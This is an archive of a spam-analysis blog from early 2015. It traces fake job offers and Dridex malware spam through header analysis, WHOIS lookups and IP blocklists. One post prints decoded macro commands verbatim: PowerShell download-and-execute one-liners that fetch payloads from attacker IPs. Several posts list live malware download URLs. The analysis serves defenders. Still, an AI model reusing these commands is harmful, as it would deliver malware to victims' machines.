87.236.215.103
108.61.198.33
Sunday, 1 March 2015
Fake job offer: "ukhomejob.com" and many others
This spam email for a fake (and illegal) job is soliciting replies to ukhomejob.com. It is part of a network of fraudulent domains, attempting to recruit victims into money laundering and other illegal activities.
From: Victim
To: Victim
Date: 1 March 2015 at 22:09
Subject: Advice
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
Our firm specializes in advertisement services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.
We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3500 GBP per month.
If you are interested in our offer, mail to us your answer on hermie@ukhomejob.com and
we will send you an extensive information as soon as possible.
Respectively submitted
Personnel department
This is related to this scam. Now though the IP used to receive emails is a Comcast IP of 98.221.25.74. The following domains are also related and are all fraudulent:
globbalpresence.com
recognizettrauma.net
gbearn.com
comercioes.com
eurohomejob.com
fastestrades.com
usaearns.com
idhomejob.com
ukhomejob.com
eurhomejob.com
The most likely "job" is money laundering, typically moving money out of stolen bank accounts and then passing on to someone in Eastern Europe. This activity is illegal, and there is a chance that you'll end up in jail at worst, or having to repay back the stolen money at best. Avoid.
Labels:
Job Offer Scams,
Spam
Saturday, 28 February 2015
Fake job offer: tradeconstruction.co.uk, spoofing the legitimate Trade Construction Company LLC
This fake job offer claimed to be from a UK-based company called Trade Construction Company LLC using a website at tradeconstruction.co.uk. However, no such company exists in the UK, and this is a rip-off of a wholly legitimate US firm that is actually called Trade Construction Company LLC who are not involved in this scam at all.
From: JOB ALERT [klakogroups@gmail.com]
Reply-To: klakogroups@gmail.com
To: Recipients [klakogroups@gmail.com]
Date: 27 February 2015 at 18:37
Subject: NEW JOB VACANCIES IN LONDON.
Trade Construction Company,
L.L.C,
70 Gracechurch Street.
EC3V 0XL, London. UK
We require the services of devoted and hardworking workers, who are ready to work after undergoing enlistment training. in all sectors
as The Trade Construction Company Management intends to increase its man power base due to increasing number of customers and contract in the Company.
Available Positions
QUANTITY SURVEY, HEALTH EDUCATOR,CIVIL ENGINEER, FIELD SURVEY SUPERVISION, WELDER,MACHINES SUPERVISOR, MECHINARY OPERATOR,
CHEMICAL ENGINEER, AUTOMOTIVE MECHANIC, DESK OFFICER, ELECTRICAL ENGINEER, CONFERENCE & BANQUETING OPERATIONS MANAGER,
STORE KEEPER,ACCOUNT MANAGER, CASHIER, ASSISTANT MANAGER OF FRONT OFFICE, RECEPTIONIST, CLEANER, FOREIGN/INTERNATIONAL LANGUAGE INTERPRETERS,
MARKETING ASSISTANT, COMPUTER OPERATOR, INTERNET SERVICE EXPERT, SECURITY PERSONNEL, HR ASSISTANT,
The Company Management would be responsible to pay for your Flight Ticket and Accommodation.
All other information about benefits which would be received by new employees would be given in their application process.
So if interested, kindly send your CV/Resume via email to recruitment@tradeconstruction.co.uk
You can also apply directly at.
http://www.tradeconstruction.co.uk/apply_online.html
website: http://www.tradeconstruction.co.uk
Phone: +447990402584
The tradeconstruction.co.uk site is almost a bit-by-bit copy of the genuine tradeconstruction.com website.
The difference in content is minimal, but the fake site contains the following contact details:
Office Address:
TRADE Company House
70 Gracechurch Street London
EC3V 0XL
United Kingdom
Phone: +447990402584
Shop Addresses:
Office 208
3 Brindley Place
Birmingham, West Midlands
B1 2JB
United Kingdom
Fax: 225-658-8067
These are actually the contact details for XL Insurance, who are obviously completely unconnected to this scam.
The fax number is invalid for the UK, and is actually just copied-and-pasted from the genuine site. The telephone number +447990402584 (07990 402584) is valid for the UK but it's a mobile phone number (possibly an untraceable prepay handset) so it could be anywhere.
As I said before, there is no company in the UK called Trade Construction Company and "LLC" is not a recognised type of UK company (typically they would be "Ltd", "PLC" or "LLP").
The WHOIS details for the domain are incomplete and unverified:
Domain name:
tradeconstruction.co.uk
Registrant:
tradeconstruction
Registrant type:
Unknown
Registrant's address:
SOUTH ROAD
ERDINTON
BIRMINGHAM
Birmingham
B23 6EL
United Kingdom
Data validation:
Registrant name and address awaiting validation
This is a residential area of Birmingham in the UK, but there is no house number and "Erdington" is spelled incorrectly. It certainly doesn't match the other contact addresses given.
Let's have a look at the mail headers to see if we can determine where this email actually came from.
Received: from mx.giki.edu.pk (mx.giki.edu.pk [121.52.146.229])
    by [redacted] (Postfix) with ESMTP id 91B60ED199
    for [redacted]; Sat, 28 Feb 2015 06:29:19 +0000 (UTC)
X-ASG-Debug-ID: 1425104952-04b09a633509b40001-Ozk3QL
Received: from mail.giki.edu.pk (mail.giki.edu.pk [121.52.146.226]) by mx.giki.edu.pk with ESMTP id 6NnzvLRyt5l62CxM; Sat, 28 Feb 2015 11:29:12 +0500 (PKT)
X-Barracuda-Envelope-From: klakogroups@gmail.com
X-Barracuda-Apparent-Source-IP: 121.52.146.226
Received: from localhost (localhost.localdomain [127.0.0.1])
    by mail.giki.edu.pk (Postfix) with ESMTP id 1127A11414ED;
    Sat, 28 Feb 2015 06:42:31 +0500 (PKT)
Received: from mail.giki.edu.pk ([127.0.0.1])
    by localhost (mail.giki.edu.pk [127.0.0.1]) (amavisd-new, port 10032)
    with ESMTP id m27tNjcw-XxF; Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
Received: from localhost (localhost.localdomain [127.0.0.1])
    by mail.giki.edu.pk (Postfix) with ESMTP id 9E5A111414D7;
    Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
X-Virus-Scanned: amavisd-new at mail.giki.edu.pk
Received: from mail.giki.edu.pk ([127.0.0.1])
    by localhost (mail.giki.edu.pk [127.0.0.1]) (amavisd-new, port 10026)
    with ESMTP id n3YhjtqX2niQ; Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
Received: from [172.245.45.23] (unknown [172.245.45.23])
    by mail.giki.edu.pk (Postfix) with ESMTPSA id 214E611414ED;
    Sat, 28 Feb 2015 06:42:23 +0500 (PKT)
We can definitely say that this email spent a while bouncing around the Ghulam Ishaq Khan Institute of Engineering Sciences and Technology in Pakistan. It appears that it originated from a server at 172.245.45.23 which is a ColoCrossing IP suballocated to:
NetRange: 172.245.45.0 - 172.245.45.31
CIDR: 172.245.45.0/27
NetName: CC-172-245-45-0-27
NetHandle: NET-172-245-45-0-1
Parent: CC-14 (NET-172-245-0-0-1)
NetType: Reallocated
OriginAS: AS36352
Organization: naa (NAA-21)
RegDate: 2013-06-07
Updated: 2013-06-07
Ref: http://whois.arin.net/rest/net/NET-172-245-45-0-1
OrgName: naa
OrgId: NAA-21
Address: 530 W. 6th Street Suite 901
City: Los Angeles
StateProv: CA
PostalCode: 90014
Country: US
RegDate: 2013-06-07
Updated: 2013-06-07
Ref: http://whois.arin.net/rest/org/NAA-21
OrgAbuseHandle: BRBA-ARIN
OrgAbuseName: Baker, Rusdi bin abu
OrgAbusePhone: +1-940-238-5499
OrgAbuseEmail: rusdi.bin.abu.bakar@gmail.com
OrgAbuseRef: http://whois.arin.net/rest/poc/BRBA-ARIN
OrgTechHandle: BRBA-ARIN
OrgTechName: Baker, Rusdi bin abu
OrgTechPhone: +1-940-238-5499
OrgTechEmail: rusdi.bin.abu.bakar@gmail.com
OrgTechRef: http://whois.arin.net/rest/poc/BRBA-ARIN
Note that this isn't saying that this "Rusdi bin abu Bakar" is sending the email, but a customer of theirs is.
Nothing about this job offer is legitimate. It does not come from who it appears to come from and should be considered to be a scam, and avoided.
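As an added example (not the blog's own code), here is a Python walk over the Received: chain quoted above, earliest hop first, that recovers the same originating address. The header text is embedded as constructed input copied from the post, and the parser assumes Postfix-style "from ... by ... with ... id ..." clauses.

```python
import re
from ipaddress import ip_address

# Constructed input: the Received headers quoted in the post above, with the
# folded continuation lines kept as they would appear in the raw message.
RAW_HEADERS = """\
Received: from mx.giki.edu.pk (mx.giki.edu.pk [121.52.146.229])
 by [redacted] (Postfix) with ESMTP id 91B60ED199
 for [redacted]; Sat, 28 Feb 2015 06:29:19 +0000 (UTC)
X-ASG-Debug-ID: 1425104952-04b09a633509b40001-Ozk3QL
Received: from mail.giki.edu.pk (mail.giki.edu.pk [121.52.146.226]) by mx.giki.edu.pk with ESMTP id 6NnzvLRyt5l62CxM; Sat, 28 Feb 2015 11:29:12 +0500 (PKT)
X-Barracuda-Envelope-From: klakogroups@gmail.com
X-Barracuda-Apparent-Source-IP: 121.52.146.226
Received: from localhost (localhost.localdomain [127.0.0.1])
 by mail.giki.edu.pk (Postfix) with ESMTP id 1127A11414ED;
 Sat, 28 Feb 2015 06:42:31 +0500 (PKT)
Received: from mail.giki.edu.pk ([127.0.0.1])
 by localhost (mail.giki.edu.pk [127.0.0.1]) (amavisd-new, port 10032)
 with ESMTP id m27tNjcw-XxF; Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
Received: from localhost (localhost.localdomain [127.0.0.1])
 by mail.giki.edu.pk (Postfix) with ESMTP id 9E5A111414D7;
 Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
X-Virus-Scanned: amavisd-new at mail.giki.edu.pk
Received: from mail.giki.edu.pk ([127.0.0.1])
 by localhost (mail.giki.edu.pk [127.0.0.1]) (amavisd-new, port 10026)
 with ESMTP id n3YhjtqX2niQ; Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
Received: from [172.245.45.23] (unknown [172.245.45.23])
 by mail.giki.edu.pk (Postfix) with ESMTPSA id 214E611414ED;
 Sat, 28 Feb 2015 06:42:23 +0500 (PKT)
"""

IPV4 = r"\[(\d{1,3}(?:\.\d{1,3}){3})\]"


def unfold(raw):
    """Join RFC 5322 folded header lines (continuations start with whitespace)."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line.rstrip())
    return lines


def parse_hop(header):
    """Pull the from/by/with/id clauses out of one unfolded Received: header."""
    body = header.split(":", 1)[1].strip()
    m = re.match(r"from\s+(\S+)\s*(\([^)]*\))?", body)
    name, comment = m.group(1), (m.group(2) or "")
    # The connecting IP is the bracketed address the receiving MTA recorded;
    # the HELO name before it is chosen by the sender and is not evidence.
    ip_match = re.search(IPV4, comment) or re.search(IPV4, name)
    by = re.search(r"\bby\s+(\S+)", body)
    proto = re.search(r"\bwith\s+(\S+)", body)
    hop_id = re.search(r"\bid\s+([^;\s]+)", body)
    return {
        "helo": name,
        "ip": ip_match.group(1) if ip_match else None,
        "by": by.group(1) if by else None,
        "proto": proto.group(1) if proto else None,
        "id": hop_id.group(1) if hop_id else None,
    }


def parse_received(raw):
    """Return the Received hops in header order (top of message = most recent)."""
    return [parse_hop(h) for h in unfold(raw) if h.lower().startswith("received:")]


def relay_path(hops):
    """Chronological (connecting IP, accepting server, protocol) triples,
    skipping the loopback hops that a content filter such as amavisd adds."""
    path = []
    for hop in reversed(hops):
        if hop["ip"] and not ip_address(hop["ip"]).is_loopback:
            path.append((hop["ip"], hop["by"], hop["proto"]))
    return path


def find_origin(hops):
    """Earliest hop whose connecting address is globally routable: the point
    where the message entered the mail system from outside."""
    for hop in reversed(hops):
        if hop["ip"] and ip_address(hop["ip"]).is_global:
            return hop
    return None


if __name__ == "__main__":
    hops = parse_received(RAW_HEADERS)
    for ip, by, proto in relay_path(hops):
        print(f"{ip:>16}  ->  {by}  ({proto})")
    origin = find_origin(hops)
    # "with ESMTPSA" is Postfix's notation for an authenticated submission over
    # TLS, i.e. the sender logged in to the institute's server with an account.
    print("origin:", origin["ip"], "accepted by", origin["by"], "via", origin["proto"])
```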
Labels:
Job Offer Scams,
Pakistan,
Spam
Friday, 27 February 2015
Malware spam: "Dennys Invoice INV650988" / "accounts@dennys.co.uk"
This fake invoice email is not from Dennys but is a simple forgery with a malicious attachment. Dennys are not sending the spam, and their systems have not been compromised in any way.
From: accounts@dennys.co.uk
Date: 27 February 2015 at 09:14
Subject: Dennys Invoice INV650988
To view the attached document, you will need the Microsoft Word installed on your system.
So far I have only seen a single sample, with an attachment INV650988.doc which has a VirusTotal detection rate of exactly zero. This contains this malicious macro [pastebin] which downloads another component from the following location:
http://hew.homepage.t-online.de/js/bin.exe
This is saved as %TEMP%\324235235.exe and has a VirusTotal detection rate of 1/57.
According to the Malwr report, this executable then goes on and downloads another version of itself and a config file from:
http://apartmentprofile.su/conlib.php
http://paczuje.cba.pl/java/bin.exe
It drops several files, KB2896~1.EXE [VT 3/57], edg2.exe [VT 3/57] and a Dridex DLL which is much more widely detected (and we saw this same DLL yesterday). (If you have a Malwr account you can download a copy of everything from here)
Between the Malwr and VirusTotal analyses, we see attempts to communicate with the following IPs:
198.52.200.15 (Centarra Networks, US)
95.211.144.65 (Leaseweb, Netherlands)
195.114.0.64 (SuperHost.pl, Poland)
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
59.97.137.171 (Broadband Multiplay Project, India)
104.232.32.119 (Net 3, US)
Some of these are shared hosting, I recommend for maximum protection that you apply the following blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
198.52.200.15
78.140.164.160
59.97.137.171
104.232.32.119
Thursday, 26 February 2015
Malware spam: "Chris Christou [chris.christou@greysimmonds.co.uk]" / "Copy invoices"
This fake invoice spam comes with a malicious attachment:
From: Chris Christou [chris.christou@greysimmonds.co.uk]
Date: 26 February 2015 at 10:45
Subject: Copy invoices
Hello ,
Please find copy invoices attached as per our telephone conversation.
Kind regards,
Chris
Chris Christou
Credit Control
Grey Simmonds
Cranes Point
Gardiners Lane South
Basildon
Essex SS14 3AP
Tel: 0845 130 9070
Fax: 0845 370 9071
Email: chris.christou@greysimmonds.co.uk
Web: www.greysimmonds.com
“Think before you Print” - Please consider the environment before printing this e-mail
It does NOT come from Grey Simmonds, nor have their systems been compromised in any way. Instead, this is a simple forgery.
I have only seen one sample so far, with an attachment IGM135809.doc [detection rate 0/57] which contains this malicious macro [pastebin] which downloads a further component from:
http://xomma.net/js/bin.exe
This is saved as %TEMP%\GVhjJJVJH.exe and has a VirusTotal detection rate of 4/56. Automated analysis tools [1] [2] show it attempting to phone home to the following IPs:
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
86.104.134.156 (One Telecom, Moldova)
104.232.32.119 (Net 3, US)
This Malwr report shows dropped files with an MD5 of 590fc032ac747d970eb8818671f2bbd3 [VT 3/57] and 1997b0031ad702c8347267db0ae65539 [VT 4/57].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
78.140.164.160
86.104.134.156
104.232.32.119
Wednesday, 25 February 2015
Malware spam: "Your LogMeIn Pro payment has been processed!"
This fake financial email does not come from LogMeIn, instead it has a malicious attachment:
From: LogMeIn.com [no_reply@logmein.com]
Date: 25 February 2015 at 08:52
Subject: Your LogMeIn Pro payment has been processed!
Dear client,
Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.
Date : 25/2/2015
Amount : $999 ( you saved $749.75)
The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.
Thank you for choosing LogMeIn!
Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:
http://junidesign.de/js/bin.exe
This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] show this calling home to the following IPs:
92.63.87.13 (MWTV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
I outlined some of the problems with MWTV in this post. The Malwr report shows that among other activities, this drops an executable that seems to be another version of itself [VT 3/57] and a malicious DLL which is probably a Dridex component [VT 4/57].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
86.104.134.156
217.12.203.34
108.61.165.19
5.196.241.196
66.110.179.66
202.44.54.5
95.163.121.179
59.97.137.171
78.140.164.160
107.181.174.104
UPDATE: a different version of the attachment [VT] uses this macro to download from:
http://jacekhondel.w.interia.pl/js/bin.exe
The payload is identical to the other variant.
Malware spam: 'Info Chemicals shared "MT 103_PO_NO!014.zip" with you' uses Dropbox
This spam leads to a malware download via Dropbox.
From: Info via Dropbox
Reply-To: hcm0366@gmail.com
Date: 25 February 2015 at 05:38
Subject: Info Chemicals shared "MT 103_PO_NO!014.zip" with you
Signed by: dropbox.com
From Info:
"Good day ,
How are you today
pls check attached, my manager had requested I email you our new order details together with TT copy of balance payment. Kindly confirm in return.
regards,
Frank Manner
Broad Oak Ltd, Tiverton, Tiverton Way, Tiverton Business Park, Tiverton, Devon, EX16 6TG
Registered No. 1971053 England & Wales
Telephone: +44 (0) 1884 242626
Facsimile: +44 (0) 1884 242602
Disclaimer :
This electronic mail transmission may contain material that is legally privileged and confidential for the sole use of the intended recipient. Any review, reliance or distribution by others or forwarding without express permission is strictly prohibited. If you are not the intended recipient or the employee or agent responsible for delivery of this message to the intended recipient, you are hereby notified that any disclosure, copying, dissemination, distribution or taking any action in reliance on the contents of this information is strictly prohibited and may be unlawful. If you have received this communication in error, please notify the sender immediately by responding to this electronic mail and then delete all copies including any attachments thereto from your computer, disk drive, diskette, or other storage device or media.
Maritim Barito Perkasa does not accept any liability in respect of communication made by its employee that is contrary to company policy or outside the scope of employment of the individual concerned."
Click here to view
(Info shared these files using Dropbox. Enjoy!)
The email has been digitally signed by Dropbox (which means exactly nothing) and is spoofing the wholly legitimate Broad Oak Ltd who have been a target of this sort of thing several times before.
In this case, the link in the email goes to:
https://www.dropbox.com/l/dFxVxjuDRo3j2oANVURy2v
and then to
https://www.dropbox.com/s/fnsprei93c45ts6/MT%20103_PO_NO!014.zip
Which leads to a malicious EXE file called MT 103_PO_NO!014.zip. Inside that is the malware itself, a file .pdf.scr which has a detection rate of 11/57. According to the Malwr report it drops another executable with a detection rate of 9/57. The payload looks similar to the Zeus trojan.
Also, according to Malwr and ThreatExpert, it attempts to communicate with an apparent web-to-Tor gateway at
mmc65z4xsgbcbazl.onion.am
onion.am is hosted on 37.220.35.39 (YISP Colo, Netherlands) and I suggest this isn't the sort of thing that you want on your corporate network regardless of its legitimate uses.
Be aware that there are probably many other Dropbox locations in use for this spam run. If you see more, I suggest you forward the email to abuse -at- dropbox.com who are normally quite good at dealing with this sort of thing.
Tuesday, 24 February 2015
Malware spam: "ArsenaL LTD" / "document do confirm" / "Izabela Pachucka [pachuckaizabela@arsenalltd.pl]"
ArsenaL LTD are a wholly legitimate Polish firm, but they are not sending out this email nor have their systems been compromised in any way. Instead, this is a simple forgery with a malicious attachment.
From: Izabela Pachucka [pachuckaizabela@arsenalltd.pl]
Date: 24 February 2015 at 08:56
Subject: document do confirm
Dear customer
Attached plese find the invoice of January loading. Please sign it, stamp and send me back till Monday.
Thank You in advance
Izabela Pachucka
tel. +48-85-747-90-53
tel. +48 516 010 976
fax. +48-85-747-90-89
iza@arsenalltd.pl
--------------------------------------------------------
Arsenal LTD Spółka z ograniczoną odpowiedzialnością Spółka Komandytowa
15-688 Białystok ul.Przedzalniana 6H
entered in the National Court Register kept
by the District Court for the city of Białystok, XII Commercial Division
under KRS 0000367679, with share capital of
PLN 15 000 000,00, NIP: 542-31-83-714,
Regon: 200392749
Joanna Grudzińska
tel. +48-85-747-91-50
mobile +48 885-852-835
grudzinskajoanna@arsenalltd.pl
--------------------------------------------------------
Arsenal LTD Spółka z ograniczoną odpowiedzialnością Spółka Komandytowa
15-688 Białystok ul.Przedzalniana 6H
entered in the National Court Register kept
by the District Court for the city of Białystok, XII Commercial Division
under KRS 0000367679, with share capital of
PLN 15 000 000,00 , o nu
I have seen only a few samples, with an attachment roexport.xls or roexport.doc, both of which are undetected by AV vendors [1] [2] and which contain two similar malicious macros [1] [2] which download another component from the following locations:
http://francis.behague.free.fr/js/bin.exe
http://dulcisinfundo.es/js/bin.exe
This is saved as %TEMP%\GHjkdfg.exe. The payload is identical to the one found in this earlier spam run.
Malware spam: "Berendsen UK Ltd Invoice 60020918 117" / "donotreply@berendsen.co.uk"
This fake invoice is not from Berendsen UK Ltd but is a simple forgery. They are not sending out the spam and their systems have not been compromised in any way. Instead, this email has a malicious Word document attached.
From: donotreply@berendsen.co.uk
Date: 24 February 2015 at 08:09
Subject: Berendsen UK Ltd Invoice 60020918 117
Dear Sir/Madam,
Please find attached your invoice dated 21st February.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.
Thank you.
___________________________________________________________
This e-mail and any attachments it may contain is confidential and
intended for the use of the named addressee(s) only. If you are not
the intended recipient, you have received it in error, please
immediately contact the sender and delete the material from your
computer system. You must not copy, print, use or disclose its
contents to any person. All e-mails are monitored for traffic data and
the content for security purposes.
Berendsen UK Ltd, part of the Berendsen plc Group.
Registered Office: 4 Grosvenor Place, London, SW1X 7DL.
Registered in England No. 228604
I have only seen one sample of this email, with a Word document IRN001549_60020918_I_01_01.doc which has a zero detection rate. Contained within this is a malicious Word macro which downloads a component from the following location:
http://heikehall.de/js/bin.exe
This binary has a VirusTotal detection rate of 2/57. Automated analysis tools [1] [2] [3] show that it attempts to phone home to:
92.63.87.13 (MWTV, Latvia)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
78.140.164.160 (Webazilla, US)
31.160.233.212 (KPN, Netherlands)
185.14.30.98 (UA Servers, Ukraine)
86.104.134.156 (One Telecom, Moldova)
MWTV have featured several times on this blog. A close examination of their 92.63.80.0/20 block indicates a mix of legitimate and illegitimate sites; however, the bad sites are concentrated in the following ranges:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
In addition to this, the malware attempts to drop a Dridex DLL which is widely detected by AV vendors with a detection rate of 30/57.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156
Thursday, 19 February 2015
Malware spam: "State Department" / "Order state T/N:" with a hidden message
These spam emails claim both to be from the "State Department" and somebody else at the same time, so I guess they must have been sent by the intern at Dridex HQ. And also they have a hidden message, apparently aimed at me..
From: Hollie Wyatt, State Department
Date: 19 February 2015 at 12:13
Subject: Order state T/N:XZ3543_327
Your order is ready for collection at your chosen store. View full order details T/N:XZ3543_327 in attached document.
Thanks!
Hollie Wyatt.
PRAETORIAN RESOURCES LTD
----------
From: Jodi Russell, State Department
Date: 19 February 2015 at 12:16
Subject: Order state T/N:HD6061_902
Your order is ready for collection at your chosen store. View full order details T/N:HD6061_902 in attached document.
Thanks!
Jodi Russell.
BARON OIL PLC
----------
From: Nathanial Mckinney, State Department
Date: 19 February 2015 at 13:26
Subject: Order state T/N:UH0141_809
Your order is ready for collection at your chosen store. View full order details T/N:UH0141_809 in attached document.
Thanks!
Nathanial Mckinney.
SIRIUS MINERALS PLC
Attached is a ZIP file that largely matches the reference number in the email, and inside that is a malicious spreadsheet called Order.xls which contains this macro.
In there is the usual combination of an encrypted string and decryption routine. Feed one into the other and you get..
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.123/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
But wait.. what's this?
http://85.143.166.123/ssdynamooss/sspidarss.cab
"Пидар" is not in my limited Russian vocabulary, but it seems to translate as a traditional type of meatball in gravy.
Incidentally, 85.143.166.123 is a Pirix IP in Russia, and I have also seen malicious activity on the following Pirix IPs:
85.143.166.123
85.143.166.72
85.143.166.132
37.139.47.167
37.139.47.103
37.139.47.117
37.139.47.105
So I think I'm going to recommend blocking a couple of Pirix /24s at the end.
Anyway.
The macro downloads a file from http://85.143.166.123/ssdynamooss/sspidarss.cab, which it saves as %TEMP%\FgdgFFFgfgF.cab, and then attempts to EXPAND it to %TEMP%\FgdgFFFgfgF.exe. This doesn't quite work as expected, because the .CAB file is already an .EXE file. Must be the intern again. Anyway, EXPAND simply copies the file from CAB to EXE so it still works.
This executable has a VirusTotal detection rate of 8/57. Automated analysis tools [1] [2] plus some private sources indicate that this malware calls out to some familiar IPs:
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)
According to the Malwr report, it drops the same Dridex DLL that has been doing the rounds all day, with a VirusTotal detection rate of 8/57.
Update:
A second spam run is happening, with various senders and subjects, for example:
Byron Pittman, Bill Department
Freda Kelly, Bill Department
Leroy Gallegos, Bill Department
Terrence Reyes, Bill Department
Tyson Miller, Bill Department
Marlene Morales, Bill Department
Royal Byrd, Bill Department
Larry Kramer, Bill Department
Jenna Sparks, Bill Department
Debra Thomas, Bill Department
LE8427_395.zip attached
MM4565_687.zip attached
SL7772_820.zip attached
MF9529_495.zip attached
DH0645_249.zip attached
ED9340_241.zip attached
HJ7305_966.zip attached
UA0899_018.zip attached
HO2362_958.zip attached
JL3695_098.zip attached
There are three different ZIP files, containing either Order.xls, Confirmation.xls or order_tatus.xls (sic). The macro is similar to the one above, but has a couple of other download locations.
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://134.19.180.44/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
These are:
134.19.180.44 (Global Layer, NL)
185.48.56.137 (Sinarohost, NL)
Payload is the same as before.
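As an added example (not code from this blog), here is a small Python IOC extractor for decoded macro command lines of the shape shown above: it pulls out the download host, the %TEMP% drop path and the EXPAND-then-start chain, and records the traits a defender would alert on. The three command strings are copied from the post; the regular expressions, field names and flag wording are my own.

```python
import re
from ipaddress import ip_address
from typing import Dict, List, Optional

# The three decoded macro command lines quoted in the post (copied from the page).
DECODED_COMMANDS = [
    r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.123/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;",
    r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://134.19.180.44/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;",
    r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;",
]

# Regular expressions are mine, written for the WebClient.DownloadFile cradle shown above.
DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dest>[^']+)'", re.I)
EXPAND_RE = re.compile(r"\bexpand\s+(?P<src>[^\s;]+)\s+(?P<dst>[^\s;]+)", re.I)
START_RE = re.compile(r"\bstart\s+(?P<exe>[^\s;]+)", re.I)
HOST_RE = re.compile(r"https?://([^/:]+)", re.I)


def parse_cradle(cmd: str) -> Optional[Dict[str, object]]:
    """Extract URL, drop path and execution chain from one decoded cradle; None if absent."""
    dl = DOWNLOAD_RE.search(cmd)
    if not dl:
        return None
    url, dest = dl.group("url"), dl.group("dest")
    host_m = HOST_RE.match(url)
    host = host_m.group(1) if host_m else ""
    try:
        ip_address(host)
        bare_ip = True  # no DNS name involved, as in all three samples in the post
    except ValueError:
        bare_ip = False
    expand, start = EXPAND_RE.search(cmd), START_RE.search(cmd)
    reasons: List[str] = []
    if bare_ip:
        reasons.append("download from bare IP address")
    if dest.upper().startswith("%TEMP%"):
        reasons.append("payload dropped under %TEMP%")
    if expand and expand.group("src").lower() == dest.lower():
        reasons.append("EXPAND run on the downloaded file (the CAB-that-is-an-EXE trick)")
    if start and expand and start.group("exe").lower() == expand.group("dst").lower():
        reasons.append("expanded file is started immediately")
    return {"url": url, "host": host, "bare_ip_host": bare_ip, "dropped_as": dest,
            "expanded_to": expand.group("dst") if expand else None,
            "executed": start.group("exe") if start else None, "reasons": reasons}


def extract_iocs(cmds: List[str]) -> Dict[str, List[str]]:
    """Distinct download hosts and URLs across a batch, ready for a blocklist."""
    parsed = [p for p in (parse_cradle(c) for c in cmds) if p]
    return {"hosts": sorted({p["host"] for p in parsed}),
            "urls": sorted({p["url"] for p in parsed})}
```

The three hosts it recovers are exactly the ones that appear in the recommended blocklist below, so the same routine can be pointed at newly decoded macros to keep that list current.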
Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24
134.19.180.44
185.48.56.137